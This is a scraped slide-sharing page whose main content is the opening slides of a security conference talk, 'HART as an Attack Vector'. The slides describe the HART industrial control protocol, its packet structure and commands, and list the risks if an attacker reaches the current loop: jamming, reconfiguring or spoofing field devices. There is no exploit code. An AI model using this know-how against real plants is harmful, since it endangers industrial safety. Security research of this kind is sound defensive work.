MMW April 2016 Ransomware Resurgence
MMW April 2016 Ransomware Resurgence MMW April 2016 Ransomware Resurgence
MMW April 2016 Ransomware Resurgence Cyphort
 
Layer 7: Getting Your SOA to Production Without Cost and Complexity
Layer 7: Getting Your SOA to Production Without Cost and ComplexityLayer 7: Getting Your SOA to Production Without Cost and Complexity
Layer 7: Getting Your SOA to Production Without Cost and ComplexityCA API Management
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomwareSophos Benelux
 
Endpoint Protection
Endpoint ProtectionEndpoint Protection
Endpoint ProtectionSophos
 
Alphorm.com Formation Microsoft ATA 2016 : Installation et Configuration
Alphorm.com Formation Microsoft ATA 2016 : Installation et ConfigurationAlphorm.com Formation Microsoft ATA 2016 : Installation et Configuration
Alphorm.com Formation Microsoft ATA 2016 : Installation et ConfigurationAlphorm
 
Alphorm.com Formation Cisco CCNA v3 : mise à jour
Alphorm.com Formation Cisco CCNA v3 : mise à jourAlphorm.com Formation Cisco CCNA v3 : mise à jour
Alphorm.com Formation Cisco CCNA v3 : mise à jourAlphorm
 
Computer security threats & prevention
Computer security threats & preventionComputer security threats & prevention
Computer security threats & preventionPriSim
 
Introduction to cybercrime
Introduction to cybercrimeIntroduction to cybercrime
Introduction to cybercrimepatelripal99
 

En vedette (20)

PLC Code Protection
PLC Code ProtectionPLC Code Protection
PLC Code Protection
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your Organization
 
Malware's Most Wanted: CryptoLocker—The Ransomware Trojan
Malware's Most Wanted: CryptoLocker—The Ransomware TrojanMalware's Most Wanted: CryptoLocker—The Ransomware Trojan
Malware's Most Wanted: CryptoLocker—The Ransomware Trojan
 
Ransomware
RansomwareRansomware
Ransomware
 
Enterprise security: ransomware in enterprise and corporate entities
Enterprise security: ransomware in enterprise and corporate entitiesEnterprise security: ransomware in enterprise and corporate entities
Enterprise security: ransomware in enterprise and corporate entities
 
Web backdoors attacks, evasion, detection
Web backdoors   attacks, evasion, detectionWeb backdoors   attacks, evasion, detection
Web backdoors attacks, evasion, detection
 
Trojan virus & backdoors
Trojan virus & backdoorsTrojan virus & backdoors
Trojan virus & backdoors
 
MMW April 2016 Ransomware Resurgence
MMW April 2016 Ransomware Resurgence MMW April 2016 Ransomware Resurgence
MMW April 2016 Ransomware Resurgence
 
Layer 7: Getting Your SOA to Production Without Cost and Complexity
Layer 7: Getting Your SOA to Production Without Cost and ComplexityLayer 7: Getting Your SOA to Production Without Cost and Complexity
Layer 7: Getting Your SOA to Production Without Cost and Complexity
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomware
 
Operating Your Production API
Operating Your Production APIOperating Your Production API
Operating Your Production API
 
Endpoint Protection
Endpoint ProtectionEndpoint Protection
Endpoint Protection
 
Alphorm.com Formation Microsoft ATA 2016 : Installation et Configuration
Alphorm.com Formation Microsoft ATA 2016 : Installation et ConfigurationAlphorm.com Formation Microsoft ATA 2016 : Installation et Configuration
Alphorm.com Formation Microsoft ATA 2016 : Installation et Configuration
 
Architecting for Resiliency
Architecting for ResiliencyArchitecting for Resiliency
Architecting for Resiliency
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Alphorm.com Formation Cisco CCNA v3 : mise à jour
Alphorm.com Formation Cisco CCNA v3 : mise à jourAlphorm.com Formation Cisco CCNA v3 : mise à jour
Alphorm.com Formation Cisco CCNA v3 : mise à jour
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
Computer security threats & prevention
Computer security threats & preventionComputer security threats & prevention
Computer security threats & prevention
 
Computer Security Threats
Computer Security ThreatsComputer Security Threats
Computer Security Threats
 
Introduction to cybercrime
Introduction to cybercrimeIntroduction to cybercrime
Introduction to cybercrime
 

Similaire à HART as an Attack Vector

Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
 
Alexander Bolshev, Alexander Malinovsky - HART (in)security
Alexander Bolshev, Alexander Malinovsky - HART (in)securityAlexander Bolshev, Alexander Malinovsky - HART (in)security
Alexander Bolshev, Alexander Malinovsky - HART (in)securityDefconRussia
 
10 Reasons to use the Renesas R-IN multi-protocol industrial ethernet solutio...
10 Reasons to use the Renesas R-IN multi-protocol industrial ethernet solutio...10 Reasons to use the Renesas R-IN multi-protocol industrial ethernet solutio...
10 Reasons to use the Renesas R-IN multi-protocol industrial ethernet solutio...Renesas Electronics Corporation
 
IP security Part 1
IP security   Part 1IP security   Part 1
IP security Part 1CAS
 
Compromising Industrial Facilities From 40 Miles Away
Compromising Industrial Facilities From 40 Miles AwayCompromising Industrial Facilities From 40 Miles Away
Compromising Industrial Facilities From 40 Miles AwayEnergySec
 
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3Linaro
 
LAS16 111 - Raspberry pi3, op-tee and jtag debugging
LAS16 111 - Raspberry pi3, op-tee and jtag debuggingLAS16 111 - Raspberry pi3, op-tee and jtag debugging
LAS16 111 - Raspberry pi3, op-tee and jtag debugging96Boards
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminskyDan Kaminsky
 
Wpmc2004 phy protection
Wpmc2004 phy protectionWpmc2004 phy protection
Wpmc2004 phy protectionArpan Pal
 
Analysis of Security and Compliance using Oracle SPARC T-Series Servers: Emph...
Analysis of Security and Compliance using Oracle SPARC T-Series Servers: Emph...Analysis of Security and Compliance using Oracle SPARC T-Series Servers: Emph...
Analysis of Security and Compliance using Oracle SPARC T-Series Servers: Emph...Ramesh Nagappan
 
FPGA implementation of synchronous and asynchronous counter and simulation of...
FPGA implementation of synchronous and asynchronous counter and simulation of...FPGA implementation of synchronous and asynchronous counter and simulation of...
FPGA implementation of synchronous and asynchronous counter and simulation of...ASHIMA GUPTA
 
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...arnaudsoullie
 
Security defined routing_cybergamut_v1_1
Security defined routing_cybergamut_v1_1Security defined routing_cybergamut_v1_1
Security defined routing_cybergamut_v1_1Joel W. King
 

Similaire à HART as an Attack Vector (20)

Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
 
Alexander Bolshev, Alexander Malinovsky - HART (in)security
Alexander Bolshev, Alexander Malinovsky - HART (in)securityAlexander Bolshev, Alexander Malinovsky - HART (in)security
Alexander Bolshev, Alexander Malinovsky - HART (in)security
 
IS Unit-4 .ppt
IS Unit-4 .pptIS Unit-4 .ppt
IS Unit-4 .ppt
 
Ipsec
IpsecIpsec
Ipsec
 
10 Reasons to use the Renesas R-IN multi-protocol industrial ethernet solutio...
10 Reasons to use the Renesas R-IN multi-protocol industrial ethernet solutio...10 Reasons to use the Renesas R-IN multi-protocol industrial ethernet solutio...
10 Reasons to use the Renesas R-IN multi-protocol industrial ethernet solutio...
 
presentation_sas2016_V3
presentation_sas2016_V3presentation_sas2016_V3
presentation_sas2016_V3
 
HSM Basic Training
HSM Basic TrainingHSM Basic Training
HSM Basic Training
 
IP security Part 1
IP security   Part 1IP security   Part 1
IP security Part 1
 
CNS UNIT-VI.pptx
CNS UNIT-VI.pptxCNS UNIT-VI.pptx
CNS UNIT-VI.pptx
 
Compromising Industrial Facilities From 40 Miles Away
Compromising Industrial Facilities From 40 Miles AwayCompromising Industrial Facilities From 40 Miles Away
Compromising Industrial Facilities From 40 Miles Away
 
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
LAS16-111: Easing Access to ARM TrustZone – OP-TEE and Raspberry Pi 3
 
LAS16 111 - Raspberry pi3, op-tee and jtag debugging
LAS16 111 - Raspberry pi3, op-tee and jtag debuggingLAS16 111 - Raspberry pi3, op-tee and jtag debugging
LAS16 111 - Raspberry pi3, op-tee and jtag debugging
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminsky
 
Wireshark Basics
Wireshark BasicsWireshark Basics
Wireshark Basics
 
Wpmc2004 phy protection
Wpmc2004 phy protectionWpmc2004 phy protection
Wpmc2004 phy protection
 
Analysis of Security and Compliance using Oracle SPARC T-Series Servers: Emph...
Analysis of Security and Compliance using Oracle SPARC T-Series Servers: Emph...Analysis of Security and Compliance using Oracle SPARC T-Series Servers: Emph...
Analysis of Security and Compliance using Oracle SPARC T-Series Servers: Emph...
 
FPGA implementation of synchronous and asynchronous counter and simulation of...
FPGA implementation of synchronous and asynchronous counter and simulation of...FPGA implementation of synchronous and asynchronous counter and simulation of...
FPGA implementation of synchronous and asynchronous counter and simulation of...
 
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
 
ELECTRONIC AND - Copy (1)
ELECTRONIC AND - Copy (1)ELECTRONIC AND - Copy (1)
ELECTRONIC AND - Copy (1)
 
Security defined routing_cybergamut_v1_1
Security defined routing_cybergamut_v1_1Security defined routing_cybergamut_v1_1
Security defined routing_cybergamut_v1_1
 

Plus de Digital Bond

The Future of ICS Security Products
The Future of ICS Security ProductsThe Future of ICS Security Products
The Future of ICS Security ProductsDigital Bond
 
Should I Patch My ICS?
Should I Patch My ICS?Should I Patch My ICS?
Should I Patch My ICS?Digital Bond
 
Attacking and Defending Autos Via OBD-II from escar Asia
Attacking and Defending Autos Via OBD-II from escar AsiaAttacking and Defending Autos Via OBD-II from escar Asia
Attacking and Defending Autos Via OBD-II from escar AsiaDigital Bond
 
Remote Control Automobiles at ESCAR US 2015
Remote Control Automobiles at ESCAR US 2015Remote Control Automobiles at ESCAR US 2015
Remote Control Automobiles at ESCAR US 2015Digital Bond
 
ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)Digital Bond
 
The RIPE Experience
The RIPE ExperienceThe RIPE Experience
The RIPE ExperienceDigital Bond
 
Windows Service Hardening
Windows Service HardeningWindows Service Hardening
Windows Service HardeningDigital Bond
 
Lessons Learned from the NIST CSF
Lessons Learned from the NIST CSFLessons Learned from the NIST CSF
Lessons Learned from the NIST CSFDigital Bond
 
Assessing the Security of Cloud SaaS Solutions
Assessing the Security of Cloud SaaS SolutionsAssessing the Security of Cloud SaaS Solutions
Assessing the Security of Cloud SaaS SolutionsDigital Bond
 
Monitoring ICS Communications
Monitoring ICS CommunicationsMonitoring ICS Communications
Monitoring ICS CommunicationsDigital Bond
 
Active Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The FieldActive Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The FieldDigital Bond
 
Accelerating OT - A Case Study
Accelerating OT - A Case StudyAccelerating OT - A Case Study
Accelerating OT - A Case StudyDigital Bond
 
API Training 10 Nov 2014
API Training 10 Nov 2014API Training 10 Nov 2014
API Training 10 Nov 2014Digital Bond
 
Unidirectional Security Appliances to Secure ICS
Unidirectional Security Appliances to Secure ICSUnidirectional Security Appliances to Secure ICS
Unidirectional Security Appliances to Secure ICSDigital Bond
 
S4xJapan Closing Keynote
S4xJapan Closing KeynoteS4xJapan Closing Keynote
S4xJapan Closing KeynoteDigital Bond
 
Internet Accessible ICS in Japan (English)
Internet Accessible ICS in Japan (English)Internet Accessible ICS in Japan (English)
Internet Accessible ICS in Japan (English)Digital Bond
 
Survey and Analysis of ICS Vulnerabilities (Japanese)
Survey and Analysis of ICS Vulnerabilities (Japanese)Survey and Analysis of ICS Vulnerabilities (Japanese)
Survey and Analysis of ICS Vulnerabilities (Japanese)Digital Bond
 
ICS Security Training ... What Works and What Is Needed (Japanese)
ICS Security Training ... What Works and What Is Needed (Japanese)ICS Security Training ... What Works and What Is Needed (Japanese)
ICS Security Training ... What Works and What Is Needed (Japanese)Digital Bond
 
Vulnerability Inheritance in ICS (English)
Vulnerability Inheritance in ICS (English)Vulnerability Inheritance in ICS (English)
Vulnerability Inheritance in ICS (English)Digital Bond
 
Incubation of ICS Malware (English)
Incubation of ICS Malware (English)Incubation of ICS Malware (English)
Incubation of ICS Malware (English)Digital Bond
 

Plus de Digital Bond (20)

The Future of ICS Security Products
The Future of ICS Security ProductsThe Future of ICS Security Products
The Future of ICS Security Products
 
Should I Patch My ICS?
Should I Patch My ICS?Should I Patch My ICS?
Should I Patch My ICS?
 
Attacking and Defending Autos Via OBD-II from escar Asia
Attacking and Defending Autos Via OBD-II from escar AsiaAttacking and Defending Autos Via OBD-II from escar Asia
Attacking and Defending Autos Via OBD-II from escar Asia
 
Remote Control Automobiles at ESCAR US 2015
Remote Control Automobiles at ESCAR US 2015Remote Control Automobiles at ESCAR US 2015
Remote Control Automobiles at ESCAR US 2015
 
ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)ICS Network Security Monitoring (NSM)
ICS Network Security Monitoring (NSM)
 
The RIPE Experience
The RIPE ExperienceThe RIPE Experience
The RIPE Experience
 
Windows Service Hardening
Windows Service HardeningWindows Service Hardening
Windows Service Hardening
 
Lessons Learned from the NIST CSF
Lessons Learned from the NIST CSFLessons Learned from the NIST CSF
Lessons Learned from the NIST CSF
 
Assessing the Security of Cloud SaaS Solutions
Assessing the Security of Cloud SaaS SolutionsAssessing the Security of Cloud SaaS Solutions
Assessing the Security of Cloud SaaS Solutions
 
Monitoring ICS Communications
Monitoring ICS CommunicationsMonitoring ICS Communications
Monitoring ICS Communications
 
Active Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The FieldActive Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The Field
 
Accelerating OT - A Case Study
Accelerating OT - A Case StudyAccelerating OT - A Case Study
Accelerating OT - A Case Study
 
API Training 10 Nov 2014
API Training 10 Nov 2014API Training 10 Nov 2014
API Training 10 Nov 2014
 
Unidirectional Security Appliances to Secure ICS
Unidirectional Security Appliances to Secure ICSUnidirectional Security Appliances to Secure ICS
Unidirectional Security Appliances to Secure ICS
 
S4xJapan Closing Keynote
S4xJapan Closing KeynoteS4xJapan Closing Keynote
S4xJapan Closing Keynote
 
Internet Accessible ICS in Japan (English)
Internet Accessible ICS in Japan (English)Internet Accessible ICS in Japan (English)
Internet Accessible ICS in Japan (English)
 
Survey and Analysis of ICS Vulnerabilities (Japanese)
Survey and Analysis of ICS Vulnerabilities (Japanese)Survey and Analysis of ICS Vulnerabilities (Japanese)
Survey and Analysis of ICS Vulnerabilities (Japanese)
 
ICS Security Training ... What Works and What Is Needed (Japanese)
ICS Security Training ... What Works and What Is Needed (Japanese)ICS Security Training ... What Works and What Is Needed (Japanese)
ICS Security Training ... What Works and What Is Needed (Japanese)
 
Vulnerability Inheritance in ICS (English)
Vulnerability Inheritance in ICS (English)Vulnerability Inheritance in ICS (English)
Vulnerability Inheritance in ICS (English)
 
Incubation of ICS Malware (English)
Incubation of ICS Malware (English)Incubation of ICS Malware (English)
Incubation of ICS Malware (English)
 

Dernier

2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 

Dernier (20)

2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 

HART as an Attack Vector

  • 1. Invest  in  security   to  secure  investments   HART  as  an  A)ack  Vector:     from  Current  Loop  to  Applica:on  Layer   Alexander  Bolshev     Security  analyst  at  ERPScan   S4x14     Digital  Bond  
  • 2.     Distributed  systems   researcher,  Ph.D.   Yet  another  man  in   somecolorhat   Alexander  Bolshev  
  • 3. ERPScan  Inc.   Leading  SAP  AG  partner  in  discovering  and  solving  security   vulnerabili:es    by  the  number  of  found  vulnerabili:es   •  The  first  to  develop  so;ware  for  NetWeaver  J2EE   assessment   •  Developed  ERPScan  Security  Monitoring  Suite:  the  only   soluHon  to  assess  all  areas  of  SAP  security   •  Invited  to  talk  at  more  than  35  security  conferences   worldwide:  BlackHat  (US/EU/DC/UAE),  RSA,  Defcon,   CONFidence,  HITB,  etc.   •  Research  team  with  experience  in  different  areas  of   security:  from  ERP  and  web  security  to  mobile,  embedded   devices,  and  criHcal  infrastructure,  accumulaHng    their   knowledge  in  SAP  research  
  • 4. What  is  HART?   •  Highway  Addressable  Remote  Transducer  Protocol   •  Developed   by   Rosemount   in   mid-­‐1980s,   supported   by   Hart   CommunicaHon  FoundaHon  (HCF)   •  Different   physical   layers:   Current   Loop,   Wireless   (802.15.4),   HART-­‐over-­‐IP,  RS-­‐485   •  Mainly   used   for   communicaHng   between   soQware/PLC   and   RTUs  (originally  transmi]ers)   •  Mostly   used   in   hazardous   environments,   i.e.   power   plants,   chemical  factories,  oil  &  gas  industry.   •  Current   loop   line   length   can   reach   up   to   3km   =>   possible   physical  security  problem   •  Hart  protocol:  Simple.  Reliable.  Secure.  ©  HCF   erpscan.com   4  ERPScan  —  invest  in  security  to  secure  investments  
  • 5. HART  devices   •  RTUs     –  Transmi]ers  (temperature,  pressure,  etc.)   –  I/O  devices   •  PLC  modules   •  Gateways   •  Modems   •  Communicators   erpscan.com   5  ERPScan  —  invest  in  security  to  secure  investments  
  • 6. HART  soQware   •  SCADA  and  HMI   •  OPC   •  PAS  (Plant  Assets  management  So;ware)   •  MES  (and  even  ERP!)  integraHon  components     erpscan.com   6  ERPScan  —  invest  in  security  to  secure  investments  
  • 7. HART  vendors       erpscan.com   7   And  much  more!   ERPScan  —  invest  in  security  to  secure  investments  
  • 8. Typical  HART  infrastructure       erpscan.com   8   Current  Loop   PAS   MES   RTUs   SCADA/OPC   PLCs HART   modem   HART   modem   HART   communicator   ERPScan  —  invest  in  security  to  secure  investments  
  • 9. HART  layers   Physical  layers:   –  FSK  (Copper  wiring,  4-­‐20mA  current  loop):   •  point-­‐to-­‐point  mode  (analog/digital)     •  mulHdrop  mode  (digital)     –  Wireless  HART  (over  802.14.5)   –  HART-­‐over-­‐IP  (TCP,  UDP)   –  RS-­‐485  HART  gateways       erpscan.com   9   OSI  Layer   HART   7   ApplicaHon   Hart  commands   2   Datalink   Binary,  Master/Slave  protocol  with  CRC   1   Physical   FSK  via  Copper  wiring,  Wireless,  RS-­‐485,  HART-­‐IP   ERPScan  —  invest  in  security  to  secure  investments  
  • 10. HART  over  Current  Loop  (HART  FSK)       erpscan.com   10   *picture  from  h]p://hartcomm.org   ERPScan  —  invest  in  security  to  secure  investments  
  • 11. HART  connec:on       erpscan.com   11   +   24V   -­‐   250Ohm   RTUs  RTU   External  Hardware   HART  Communicator   Source  wiring     (change  polarity  for  sink,    add  forth  wire  for  isolated)   ERPScan  —  invest  in  security  to  secure  investments  
  • 12. HART  packet  structure   •  Every  packet  started  with  0xff…0xff  preamble   •  Two  packet  types:  short  and  expanded   •  Two  address  type:  polling  and  unique   •  Three  frame  types:   –  Burst  frame  (BACK,  1)   –  Master  to  field  device  (STX,  2)   –  Field  device  to  master  (ACK,  6)   •  Check  byte:  XOR  of  all  bytes   •  Three  types  of  commands:  Universal,  Common  PracHce  and   Device  Families.     erpscan.com   12   Delimeter   Address   [Expand]   Command   Byte  Count   [Data]   Check  byte   ERPScan  —  invest  in  security  to  secure  investments  
  • 13. HART  commands   HART  has  two  addressing  schemes:   –  Polling  ID  (set  by  engineer,  used  for  geong  unique  ID)   –  Unique  ID  (unique  per  RTU)   HART  commands  divides  into  three  groups:   •  Universal:   –  OperaHons  with  id,  geong  main  variable,  tag  operaHons,  e.t.c.   •  Common  pracHce:   –  Engineering  and  process  specific  commands.   •  Device  Families:   –  Device  family  specific  commands.    erpscan.com   13  ERPScan  —  invest  in  security  to  secure  investments  
  • 14. Possible  risks   If  a]acker  will  get  access  to  the  HART  channel,  he  could:   •  Jam  the  channel  to  distract  normal  process.   •  Reconfigure  RTUs  (change  the  variables  limits,  alarm   ranges,  e.t.c.),  even  reflash  and  write  to  EEPROM.   •  Spoof  some  RTUs  variable  data  (we’ll  talk  later  about   how  to  do  this).   •  Exploit  vulnerabili?es  in  HART  soBware.   •  ACack  systems  that  uses  data  from  HART  soBware.       erpscan.com   14  ERPScan  —  invest  in  security  to  secure  investments  
  • 15. But…       erpscan.com   15  ERPScan  —  invest  in  security  to  secure  investments   …you  can’t  just  simply  spoof  the  HART  packet.  
